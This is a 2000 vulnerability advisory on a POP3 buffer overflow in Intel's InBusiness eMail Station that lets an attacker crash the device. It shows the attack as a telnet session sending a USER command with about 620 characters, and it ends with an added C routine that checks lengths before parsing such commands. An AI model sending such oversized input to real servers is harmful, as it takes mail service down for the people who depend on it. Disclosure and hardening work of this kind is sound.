Title: Intel corporation 'InBusiness eMail Station'
Released by: Knud Erik Højgaard
Date: 20th October 2000

Intel corporation 'InBusiness eMail Station' firmware version 1.04.87
(latest) Denial of service vulnerability.
Vendor notification date: 20/10-2000
Public notification date: 20/10-2000
Problem: I found a buffer overflow in the Intel InBusiness eMail Station,
which can enable an attacker to execute a denial of service attack against it.
Disclaimer: For educational purposes only.
Example:
[foo@bar]$ telnet mailstation 110
Trying mailstation...
Connected to mailstation.
Escape character is '^]'.
+OK Pop server at mailstation starting. <2831812.972049732@mail>
user [buffer]
where [buffer] is approx. 620 chars of your own choice (tried A and %, expect
all to work).
Symptoms: The box (a nice little piece of hardware with built-in hard drive
and all) will stop responding, and needs a power cycle to restore function.
Reason for posting same date as vendor notification: Intel was contacted
and informed of the bug, and all they had to say was "You're using it in a
way it's not supposed to be used" (I told them it was on a leased line) - in
their opinion it doesn't matter since it's possible to connect a modem to it,
and use it for retrieving mail and distributing it locally.
Sincerely (and a big thanks to Intel for not caring about product security
at all)
Knud Erik Højgaard
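
Added example, not part of the original advisory and not Intel's firmware code: a length-checked parser for the POP3 USER command, showing the bounds checks that keep an overlong argument like the one above from overrunning a fixed buffer. The function name, buffer sizes and status codes are assumptions; the limits come from RFC 1939 (40-character arguments) and RFC 2449 (255-octet command lines).

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define POP3_MAX_LINE 255 /* RFC 2449: whole command line, CRLF included */
#define POP3_MAX_ARG   40 /* RFC 1939: each argument, at most 40 characters */

enum pop3_status { POP3_OK, POP3_ERR_TOO_LONG, POP3_ERR_SYNTAX };

/* Hypothetical handler: `line` holds `len` received bytes (not
 * NUL-terminated). The USER argument is copied to `out` only once every
 * length has been checked against the protocol limits and `outsz`. */
enum pop3_status pop3_parse_user(const char *line, size_t len,
                                 char *out, size_t outsz)
{
    size_t i, arglen;

    if (out == NULL || outsz == 0)
        return POP3_ERR_SYNTAX;
    out[0] = '\0';
    if (len > POP3_MAX_LINE)            /* reject before parsing anything */
        return POP3_ERR_TOO_LONG;
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                          /* drop the line terminator */
    if (len < 6 || line[4] != ' ')      /* shortest form is "USER x" */
        return POP3_ERR_SYNTAX;
    for (i = 0; i < 4; i++)
        if (toupper((unsigned char)line[i]) != "USER"[i])
            return POP3_ERR_SYNTAX;
    arglen = len - 5;
    if (arglen > POP3_MAX_ARG || arglen >= outsz)
        return POP3_ERR_TOO_LONG;
    for (i = 0; i < arglen; i++)        /* printable ASCII, no spaces */
        if (line[5 + i] < 0x21 || line[5 + i] > 0x7e)
            return POP3_ERR_SYNTAX;
    memcpy(out, line + 5, arglen);
    out[arglen] = '\0';
    return POP3_OK;
}

int main(void)
{
    /* Constructed sample input, not taken from the advisory. */
    const char *ok = "USER alice\r\n";
    char name[POP3_MAX_ARG + 1];
    enum pop3_status st = pop3_parse_user(ok, strlen(ok), name, sizeof name);
    printf("%s\n", st == POP3_OK ? "+OK" : "-ERR invalid USER command");
    return 0;
}
```

A server using this check answers an oversized USER line with -ERR and keeps running instead of copying the argument into a buffer.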